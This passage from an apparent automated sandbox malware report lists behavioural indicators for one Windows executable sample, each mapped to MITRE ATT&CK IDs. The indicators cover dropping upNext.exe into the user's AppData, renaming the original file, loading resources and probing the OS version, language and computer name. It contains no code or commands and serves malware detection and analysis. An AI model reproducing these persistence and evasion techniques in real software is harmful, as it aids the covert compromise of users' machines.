\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\version.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\version.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe.Local\\\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\comctl32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\SHFolder.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to touch file \"C:\\Windows\\system32\\SHFolder.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe.Local\\\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.ENU\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.EN\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" connecting to \"\\ThemeApiPort\"\n \"upNext.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" writes file \"c:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\upnext.exe\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" writes file \"%localappdata%\\upnext.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"29ED4D2479AB0CFDC61BFB2F87F81463AF3F3DBC61C015D2BC013550B32627A9\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"CATEGORY\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"NAME\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"PARENTFOLDER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00005952]\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\" - Location: [C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" renamed original file\"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" to \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.del\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" renamed original file\"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\" to \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263288'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262872'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263304'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262888'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263320'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262904'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263336'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262920'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263352'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262936'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263384'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262968'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263368'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262952'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263400'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262984'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263000'}\" (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadResource with parameter {'hModule': '2000158720', 'hResInfo': '7276016'}\" (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd3340090642500e07e72000000000090d334001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d3340038d611006d0000001600000019e00400 (UID: 00000000-00005952)\n \"upNext.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd35a0090644b00e07e82010000000090d35a001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d35a0038d611006d0000001600000019e00400 (UID: 00000000-00001484)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@kernel32.dll directly followed by \"cmp ax, 0004h\" and \"jc 00080776h\" at 36480-4291-000805C0", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000001400000038fe23000d00000000007200d87e720038fe2300145c2577435c257727d401777b270000ec01720000007200500172003f000000ff070000500172007c3c0040000000002700390014000000006d3a0050017200c86f3a00e07e72002000000021000000000000000d000000b86c3a00d86d3a00d8853d0080713a000000000021000021c4007200dcfe230095e121770f360700000000007f0000009a2a257721000021c400720001000000000000000200000008000000e07e7200e07e7200db7e72000000000008fe23000000720054fe230168fd230002000000 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"IsWow64Process\" with parameter \"5952\" - (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": 